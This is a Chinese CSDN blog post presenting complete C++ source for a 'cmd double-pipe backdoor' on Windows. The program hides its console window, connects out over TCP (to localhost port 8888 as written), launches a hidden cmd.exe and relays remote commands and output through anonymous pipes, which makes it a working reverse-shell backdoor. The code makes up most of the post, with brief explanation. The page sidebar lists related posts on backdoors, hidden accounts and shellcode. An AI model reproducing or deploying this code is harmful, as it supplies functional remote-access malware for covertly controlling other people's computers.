简单的cmd双管道后门

最新推荐文章于 2023-07-04 10:31:02 发布
最新推荐文章于 2023-07-04 10:31:02 发布
阅读量938 收藏 2
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42124567/article/details/90274052
版权

这几天学习了一下windows后门编程,并尝试着写了一个简单的cmd双管道后门。主要涉及到了socket通信和管道。
后门分为主动连接型和反向连接型,区别就是一个是后门程序作为服务端,另一个是后门程序作为客户端。
双管道的原因:cmd执行结果写入管道1写句柄,后门从管道1读句柄读取cmd执行结果,后门接受到的命令通过管道2的写句柄写入,cmd通过管道2的读句柄读出。
多的不说,直接上代码,我觉得注释还是比较详细了

#include<iostream>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<winsock.h>
#include<Windows.h>

#pragma comment(lib,"ws2_32.lib")

SOCKET Connecting(unsigned short Port);
void CmdLine(SOCKET s);
int Hide();

int main() {
	Hide();
	SOCKET s;
	s = Connecting(8888);
	CmdLine(s);
	closesocket(s);
	WSACleanup();
	return 0;

}

SOCKET Connecting(unsigned short Port) {
	WSADATA wsa;
	if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
		return SOCKET_ERROR;

	//创建套接字
	SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (s == INVALID_SOCKET)
		return SOCKET_ERROR;

	//对sockaddr_in结构体填充地址,端口等信息
	struct sockaddr_in ServerAddr;
	ServerAddr.sin_family = AF_INET;
	ServerAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
	ServerAddr.sin_port = htons(Port);


	//连接服务器
	while (connect(s, (SOCKADDR *)&ServerAddr, sizeof(ServerAddr)));
	return s;
}
void CmdLine(SOCKET s) {
	//双管道读写句柄
	HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;
	//对SECURITY_ATTRIBUTES结构体进行填充
	SECURITY_ATTRIBUTES se;
	se.nLength = 12;
	se.lpSecurityDescriptor = 0;
	se.bInheritHandle = true;
	//创建管道
	CreatePipe(&hReadPipe1, &hWritePipe1, &se, 0);		//管道1
	CreatePipe(&hReadPipe2, &hWritePipe2, &se, 0);		//管道2
	
	//指定cmd的启动信息
	STARTUPINFO si;
	ZeroMemory(&si, sizeof(si));
	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = hReadPipe2;
	si.hStdOutput = si.hStdError = hWritePipe1;
	
	PROCESS_INFORMATION Pro;
	//创建进程
	char cmdline[] = "cmd.exe";
	CreateProcess(NULL,cmdline, NULL, NULL, 1, 0, NULL, NULL, &si, &Pro);

	
	while (1)
	{	
		unsigned long lBytesRead;
		char Buff[1024];
		//查看cmd是否有输出
		PeekNamedPipe(hReadPipe1, Buff, 1024, &lBytesRead, 0, 0);
		if (lBytesRead)
		{
			//读取cmd的输出,发送到客户端
			ReadFile(hReadPipe1, Buff, lBytesRead, &lBytesRead, 0);
				send(s, Buff, lBytesRead, 0);

		}
		else
		{
			//接收客户端命令
			lBytesRead = recv(s, Buff, 1024, 0);
			//把命令传给cmd
			WriteFile(hWritePipe2, Buff, lBytesRead, &lBytesRead, 0);
		}
	}
}

int Hide() {
	HWND hwnd;
	hwnd = FindWindow("ConsoleWindowClass", NULL);	//处理顶级窗口的类名和窗口名称匹配指定的字符串,不搜索子窗口。
	if (hwnd)
	{
		ShowWindow(hwnd, SW_HIDE);				//设置指定窗口的显示状态
	}
	return 0;
}

运行效果:
在这里插入图片描述
第一次写,代码很简陋,也存在很多问题,大佬们看看就好了,望轻喷,随着以后的学习,我也会继续改进的。

dish chicken
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
管道cmd.exe进程间通信演示
Just Do It
06-02 2950
看《老狼Gh0st远程协助软件编写系列教程(上半部)》视频的时候,4.1节有讲到管道cmd.exe进程间通信。所写的demo工程只能一次输入一个命令,然后返回。再次输入的时候会出现问题。在这里,我改进了一下代码,每次都可以输入命令,然后返回结果。       简单的MFC程序如下,启动之后,不管是否在命令输入框里输入内容,点击确定都只是出现cmd.exe的启动信息,如下图所示:    
cmd后门cmd后门
01-03
放大镜建用户 放大镜建用户 放大镜建用户
管道(CreatePipe)与本地cmd.exe进程通信.exe
09-07
在本地,用父进程创建一个cmd.exe子进程,这个子进程的输入输出被重定向到两条匿名管道,从而实现与父进程通信。父进程输入命令到一条管道,子进程读取后执行并输出到另一条管道,父进程读取后输出到窗口。此版本源代码借鉴并修改、优化了前人的创作,详见:https://blog.csdn.net/aq782645210/article/details/16370409
进程间通讯---匿名管道
小米的修行之路
03-09 557
最近实现一个远程超级终端的功能,通信模式是这样的: 客户端------通过网络发送cmd命令到------服务器端------通过进程间通信(管道),将此cmd命令发给-----cmd.exe程序,cmd.exe执行此cmd命令 接下来: cmd.exe------程序将执行结果返回------服务器端------发送此次结果到------客户端,客户端对结果进行显示 其中服务器端程序和c...
管道打开cmdshell
天元喜羊羊的博客
07-21 1054
源代码如下: #include #include #include #pragma comment(lib,"Ws2_32") #define SZBUFFER_SIZE 1024 #define LST_PORT 9090 SOCKET InitializeServer(VOID) { WORD version = MAKEWORD(2, 2); WSADATA wsaDat
管道(CreatePipe)与cmd.exe进程间通信的有关问题 完美解决
aq782645210的专栏
11-17 3932
[SIZE="5"];):最近研究怎么在别人电脑里开个CMD shell,就是直接用CMD执行我们的命令,遇到不少问题,但终于把问题完美解决了!!!!;):[/SIZE] [COLOR="Red"]问题1:为什么启动cmd.exe时能读到(ReadFile)的初始化信息, 但是再WriteFile(往管道里写数据后),cmd却没有任何信息,即PeekNamedPipe函数中的参
1.6 编写管道ShellCode后门
CSDN
07-04 4752
本文将介绍如何将`CMD`绑定到管道上,这是一种常用的黑客反弹技巧,可以让用户在命令行界面下与其他程序进行交互,我们将从创建管道、启动进程、传输数据等方面对这个功能进行详细讲解。此外,本文还将通过使用汇编语言一步步来实现这个可被注入的`ShellCode`后门,并以此提高代码通用性。最终,我们将通过一个实际的漏洞攻击场景来展示如何利用这个后门实现内存注入攻击。
windows创建隐藏用户及后门
diaobusi的博客
06-20 1811
在Windows操作系统中,用户系统是用于管理和控制用户访问、权限和资源的一组功能和机制。以下是Windows用户系统的一些关键概念和组成部分:用户账户:Windows用户系统基于用户账户来管理用户访问和权限。每个用户都必须拥有一个唯一的用户账户,用户账户包含了用户的登录名和密码等信息。用户账户可以是本地账户(仅限于本地计算机)或域账户(属于域控制器管理的网络域)。
使用管道实现简单CMD后门程序,并转化为Shellcode
Birldlee的博客
12-26 2711
实现一个能实现远程控制功能的shellcode,控制被攻击的主机。
黑客编程入门 之 后门编写初探
Steve·Curcy
09-05 1260
后门编写初探基本的执行DOS命令木马所需函数代码实现零管道木马和反弹木马零管道反弹木马木马功能的增强和扩展模块打造初步后门cmd shell 的自由切换模板 = 木马普通木马的自启动启动文件夹注册表启动其他 基本的执行DOS命令木马   我们现在先考虑最早的木马:将目标主机作为服务器,打开一个端口进行监听,攻击者就可以通过telnet进行连接。   DOS功能是木马必须拥有的最小的功能模块。那么我们现在的任务就是:1. 开创 cmd.exe 进程;2. 把 cmd 进程和客户的输入连起来。那么接下来介绍一下
cmd组合和管道命令的使用方法(命令组合)
weixin_47616219的博客
11-23 4238
1.& Usage:第一条命令 & 第二条命令 [& 第三条命令...] 用这种方法可以同时执行多条命令,而不管命令是否执行成功 2.&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则 一直执行完所有命令; 在做备份的时候可能会用到这种命令会比较简单,如: dir file&://192.168.0.1/
服务器后门(cmd使用)
03-24
服务器后门
管道后门源代码,用telnet进行攻击
02-24
之前传了一个压缩包,居然有密码,而且我自己都解不开,重新传一个,就不收分了
匿名管道管道后门后门技术
06-25
匿名管道管道后门后门技术匿名管道管道后门后门技术
VC远程CMD,设置后门
04-14
在主机上设置一个50000端口的后门,本地主机可通过telnet获得远程主机的cmd
Python课程设计 课设 手写数字识别卷积神经网络源码+文档说明.zip
04-24
高分设计源码,详情请查看资源内容中使用说明 高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明高分设计源码,详情请查看资源内容中使用说明
SpringBoot2.0快速开发框架权限.rar
04-24
SpringBoot2.0快速开发框架权限.rarSpringBoot2.0快速开发框架权限.rarSpringBoot2.0快速开发框架权限.rar
大语言模型的微调和推理baichuan7B, chatglm2-6B, Qwen-7B-chat源码.zip
最新发布
04-24
详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;详情请查看资源内容中使用说明;
基于Qt与STM32平台开发的汽车车机系统上位机
04-24
基于Qt开发的汽车车机系统上位机 & 常见类型汽车传感器信号模拟发生器 任务和要求: 任务: 根据发动机测控系统信号需求,设计一套发动机信号模拟器人机交互系统,能够根据需要向下位机输出控制信号,使其输出发动机测控系统需要的传感器模拟信号,给发动机测控系统的开发提供方便。 要求: 1.设计应包含上位机与下位机的交互程序及人机交互界面的设计,与下位机设计相结合,使其能够实现全部类型发动机传感器信号的模拟输出及显示。 2.设计中需要采用模块化开发程序。 3.所设计的人机交互界面简洁合理。 4.应考虑所设计系统的实用性。 具体工作内容: 1.根据设计目标,查阅相关设计标准和设计方法资料,对发动机信号模拟器设计中的关键工程原理和工程方法进行提炼,并围绕关键问题进行国内外设计现状调研,开展分析、评价与总结,确定主要研究内容,制定设计技术路线,制定设计计划(周进度),撰写开题报告,并进行开题答辩,开题报告参考文献应不少于15篇(其中外文文献不少于 4 篇,近五年文献不少于三分之一)。 2.根据设计要求和技术指标,进行满足功能原理需求的多方案拟定,考虑安全、 标准等多因素进行技术性与经济性评价
buuctfwebshell后门
07-27
回答: 根据提供的引用内容,buuctfwebshell后门可能是一个存在于buuctf网站中的后门。具体的操作和细节需要进一步的信息才能确定。引用\[1\]中提到了一个HTTP请求,其中包含了一个名为admina的参数和一个名为adminb的参数。这可能是用于触发后门的关键参数。引用\[2\]中提到了图片的修改和破解过程,可能是用于隐藏和传递后门的一种方式。引用\[3\]中提到了steghide和九连环的相关信息,这可能是用于加密和解密后门的工具和步骤。综合这些信息,buuctfwebshell后门可能是通过HTTP请求和图片隐藏来实现的一种后门机制。 #### 引用[.reference_title] - *1* *2* *3* [BUUCTF MISC入门](https://blog.csdn.net/m0_67837149/article/details/125937819)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值